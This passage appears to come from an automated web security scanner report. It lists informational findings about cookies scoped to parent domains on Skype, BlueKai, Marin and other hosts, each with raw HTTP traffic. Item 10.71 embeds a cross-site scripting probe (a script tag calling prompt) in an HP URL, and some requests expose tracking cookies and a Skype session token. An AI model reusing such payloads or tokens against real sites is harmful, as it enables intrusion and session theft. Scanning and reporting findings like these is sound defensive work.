10.61. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:00 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=392412041; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 22:43:00 GMT
Expires: Mon, 03 Sep 2012 22:43:00 GMT
Content-Length: 8250
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

10.62. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:00 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=2140806654; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 22:43:00 GMT
Expires: Mon, 03 Sep 2012 22:43:00 GMT
Content-Length: 6587
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

10.63. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:00 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1079284173; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 22:43:00 GMT
Expires: Mon, 03 Sep 2012 22:43:00 GMT
Content-Length: 8962
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

10.64. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:00 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1675159679; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 22:43:00 GMT
Expires: Mon, 03 Sep 2012 22:43:00 GMT
Content-Length: 7225
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

10.65. http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=603479162; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:12:46 GMT
Expires: Mon, 03 Sep 2012 21:09:48 GMT
Cache-Control: s-maxage=562284
Vary: Accept-Encoding
Content-Length: 5958
Connection: close
Content-Type: text/javascript;charset=UTF-8


if(typeof LITHIUM=='undefined'){var LITHIUM={};};

LITHIUM.Loader=(function(){var functionCache=[];var loaded=false;return{"onLoad":function(func){functionCache.push(func);},getOnLoadFunctions:funct
...[SNIP]...

10.66. http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:42:59 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=837874165; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:10:58 GMT
Expires: Mon, 03 Sep 2012 22:42:59 GMT
Cache-Control: s-maxage=563424
Vary: Accept-Encoding
Content-Length: 16545
Connection: close
Content-Type: text/javascript;charset=UTF-8


if(jQuery.isLithium!==true){jQuery=LITHIUM.jQuery;}
;(function($LITH){LITHIUM.DropDownMenu=function(menuElementSelector,clickElementSelector,mouseoverElementSelector,closeMenuEvent){var menus=[];var
...[SNIP]...

10.67. http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/help/faqpage/faq-category-id/posting
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:21 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1880989334; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:10:32 GMT
Expires: Mon, 03 Sep 2012 21:10:21 GMT
Cache-Control: s-maxage=562317
Vary: Accept-Encoding
Content-Length: 4687
Connection: close
Content-Type: text/javascript;charset=UTF-8


if(jQuery.isLithium!==true){jQuery=LITHIUM.jQuery;}
;(function($LITH){LITHIUM.Dialog=function(params){var triggerSelector=params.triggerSelector;var runOnceMap=$LITH(document.body).data("LITHIUM.Dia
...[SNIP]...

10.68. http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:01 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=2119305899; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:10:28 GMT
Expires: Mon, 03 Sep 2012 21:10:01 GMT
Cache-Control: s-maxage=562314
Vary: Accept-Encoding
Content-Length: 15854
Connection: close
Content-Type: text/javascript;charset=UTF-8


if(jQuery.isLithium!==true){jQuery=LITHIUM.jQuery;}
;(function($LITH){LITHIUM.DropDownMenu=function(menuElementSelector,clickElementSelector,mouseoverElementSelector,closeMenuEvent){var menus=[];var
...[SNIP]...

10.69. http://skypec.i.lithium.com/t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:56 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=461371398; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:14:16 GMT
Expires: Mon, 03 Sep 2012 21:09:56 GMT
Cache-Control: s-maxage=562267
Vary: Accept-Encoding
Content-Length: 62201
Connection: close
Content-Type: text/javascript;charset=UTF-8


if(jQuery.isLithium!==true){jQuery=LITHIUM.jQuery;}
;(function($LITH){LITHIUM.CustomEvent=function(selector,triggerEvent){LITHIUM.Cache.create("CustomEvent",["elementId","triggerEvent"]);$LITH(selec
...[SNIP]...

10.70. http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:56 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=181743754; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:12:46 GMT
Expires: Mon, 03 Sep 2012 21:09:56 GMT
Cache-Control: s-maxage=562286
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 255135

;(function(){LITHIUM.Sandbox=function(){var localjQuery=window.jQuery;var local$=window.$;return{restore:function(){window.jQuery=(localjQuery!==undefined)?localjQuery:window.jQuery;window.$=(local$!=
...[SNIP]...

10.71. http://tags.bluekai.com/site/4234  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4234

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/4234?ret=html&limit=15&r=95685&phint=v30%3Dh30187%2Ferror%7Cview%3Dnone&phint=v16%3Dsolutions&phint=v24%3Dany&phint=v11%3Dapplied_use&phint=v26%3DUS&phint=v08%3DHP.com%20offers%20free%2C%20instructor-led%2C%20online%20business%2C%20technology%20and%20IT%20online%20classes%2C%20and%20quick%20lessons%3B%20all%20available%2024%2F7.&phint=v29%3Dany&phint=v31%3DHP%20System%20Error&phint=v32%3Dhttp%3A%2F%2Fh30187.www3.hp.com%2Findex.jspca059%2522%253E%253Cscript%253Eprompt(document.location)%253C%2Fscript%253Eaf8ce681eb5&phint=pageReferrer%3Dhttp%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: bk=D2OG+HhCdnkMq/0A; bkc=KJh56X6gOcWROdeFf1yur0JhxJENUGQqAKV9cYpk/LHCTIe3Tv/GB3NyGeCy5a1ATuv04TYe9bl0zieWyDPJKUZKt4tBKUTNm2r7IEfwftPIL89alnyS3wABCpyyLWYKKemydC1mKVcSc+zz48PK2U3WX6hob6cZmXrAC0y/w0qfZpu4+cEQSelhl9OL7XNv5Xh/Xf20MsbfIDeluyI+fbYKFSmjhN4KoFg24SO2S+Yrjp5aoeZFwmzewZk2CbU5Mo2uoDw6z8Fgkz2BGeAvnJW2uDXmuNXNua2Gc3ZEgibxerjJXdCr6IUT75SluwmwIhwpR8L4WmfNuU1d8VAFfDzdp57kWD+b0mPGJot4EymUnL2gE7ZxeZQrNLp2kK2GzuZBy9OT4EZtnztzPyfEIEFf1gYJHetfj9pY7azr291jOxStBgGzIpHpUgAG9Ii7XlduW3Epcz2kF8PeZwwvWHGFZfb7Fg6tr882uFFFBrKPMIk2VecQGvnPXUh9ZFwv1qv4XAlOGm1V7pE7kP2GFv66eyvMpR8gBUBKIjjzuzIMTUIlD7IlmSdXE4+NdtwQr4p4BXFuIHUuabUuq4x2rzl2k5KuflFkrioWhOIpuF/P; bko=KJ0fyzc9TaGEfz4/1/ZBQVsgi3X4mXBWqQiniKW6ayBen8ea0Yecetm58RSh4Gk9VWy15lCCRGk9NMDKAJQLcyweYpDqwtRsuuinAxW9OxGVBy==; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0aAEWFxNWRCodg8vofODDUfJouSRZOWv6f5v9eGLoudGu/iKQQ4GcajeHnpaQAAAqX9OabWpSes1Plzib76Ggk7JwFI5fFKdmKphaQ1mHKnoI+9MCTdLDhw/ySTLFP0XZTJ4D6OvZx4JKutLzWvsG3wRuzZNk2fkxQkgcbJwmEPMXZwRWUzCKeq3SUVILED2nashDcIA7m+m8vuH4iHUzktaTyVygfzeDcCzik0lkmA8gvezOClFC4r+SNkfhN2orXdAZ6hoPoY3vjpzbSjdt709qbW6vst0embSn5cozl75IJ3xq0VexolbeJq5suLrHvHXibEmLCLtnJl3GCmC7afGjJHFLTWO//KU467pIUGa66pG27Abp7UNjNj4S/SsvNx55cF5EbgXfVfabUofn5IyDAmcQH; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpb4IudROueYy1ZHPRJxWlt90y; bkst=KJhBEf+v9NWDwWP91aWetZGPLwcY7FrIVrQSPyCZN6i/uL9irlzUJuxH1Ri2k7bOvqVhLTiPkHXQPGodTu5T5b+15jQj8L0DTc6KcvqgmNWJw+h5Q8C8BOaVWYA0ugiUS5/pNJ9AkMEVNiS2Nsh+qpFdkdwwyUMRcT8rC+IP6aadMkGsokO0vxPcnqDVE9MpVXCl84yeE87CUcZWoSi/PiRM6ioameG/0twHLtINlw2z7F7yDaYgaR9P/YQ1SrGhxjWpoEtMI5BMyIkgYy9PbcSwg68lypTm2iXZjlrm4NZzijGVDj2n9O+x2TBtzBeLBgBsJh3xTvHNKblwO2AGeeSpP7HTPOIwnGwx2TBmdS5RAPEpYAyZ1+q1/CD357rHozAWzFtIZk59e0VEDi3rLwl3HddTzNKo; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; bklc=4e63fe97; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:59:53 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e642d19; expires=Wed, 07-Sep-2011 01:59:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=WbE4+OhCdnkMq/0A; expires=Sat, 03-Mar-2012 01:59:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh566N/asWROdedf/yqBirJ8WskyWNUQT3XsubmK0MhLswxHPn01BuCSTzrQRWrL3/KY+oecq6aHRCbiVJUbBCCeXDvVht1AFUQHHeOMIKjlU4t4PbR7KUcdJd7djClk+3OSLlYpqw9+fsBJ4vp4xra6XYwTNFGoTRgBK7UnEcCnkFStjU8XUfosx4Y4hF2qPCGFxCLaKgwnuO6zPfblA+odkzr6KNMB8e5ZdHMtOCi4pe1T0rdodgN5KeriIZy7MtuAISXXG/ncBcbBFr0A425Awqoo8FgkqdqxeGwgJOMeE2dJwNpVnoLKwSt2/6KSS2nZL4UEP4A9Ng41LtdA3MwMt64xFiIvXl2km5SSeIZS1bSjhloszl8ulHIMipX6nhGmnTg7EEzS8MfvdIZhzUF99dObfLztMc1KKV9pkdht1/fNmFjN889ZwwvPhJ9VTIa+qzEAPle7aKItQj1647d1rgHIS86LF5EWmSXzGfsbbeFbzs7EaMwdAgfg8Fp0odo4EQkRsBQnwJiDogp0iP0QF/M7C58NJUZFw/KMq4VsAw0zEg0nzmzPd8ac3E7ISeo1K3FZdwvJfH446T+dWXNUPtPfCbxnF5JjICf6Ll2k5X6lFKg7KLIWKzvT4MT; expires=Sat, 03-Mar-2012 01:59:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpb4IudROueYy1ZHDRAovbvUT91tXnRQ==; expires=Sat, 03-Mar-2012 01:59:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Tue, 06-Sep-2011 01:59:53 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
BK-Server: c612
Content-Length: 77
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">

</div>

</body>
</html>

10.72. http://tracker.marinsm.com/rd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.marinsm.com
Path:   /rd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rd?cid=901pdb6671&mid=901qz26673&mkwid=s1CStlI5S&pcrid=13885348293&pkw=application%20security%20web&pmt=b&lp=http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0?kw=application%20security%20web&mpre=http%3A%2F%2Flt%2Edell%2Ecom%2Flt%2Flt%2Easpx%3FCID%3D64824%26LID%3D1652027%26DGC%3DST%26DGSeg%3DBSD%26DURL%3Dhttp%253A%252F%252Fcontent%252Edell%252Ecom%252Fus%252Fen%252Fbusiness%252Fsecurity%252Dnetwork%252Easpx%3Fst%3Dapplication%20security%20web%26ACD%3Ds1CStlI5S,13885348293,901qz26673 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Pragma: no-cache
Cache-Control: private, no-cache
Location: http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0?kw=application security web&mpre=http%3A%2F%2Flt.dell.com%2Flt%2Flt.aspx%3FCID%3D64824%26LID%3D1652027%26DGC%3DST%26DGSeg%3DBSD%26DURL%3Dhttp%253A%252F%252Fcontent%252Edell%252Ecom%252Fus%252Fen%252Fbusiness%252Fsecurity%252Dnetwork%252Easpx%3Fst%3Dapplication+security+web%26ACD%3Ds1CStlI5S%2C13885348293%2C901qz26673
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 04 Sep 2011 16:18:47 GMT
Connection: close
Set-Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33; Domain=marinsm.com; Expires=Mon, 03-Sep-2012 16:18:47 GMT; Path=/


10.73. http://ui.skype.com/ui/0/5.5.0.114./en/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.114./en/help

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.114./en/help HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:03:33 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
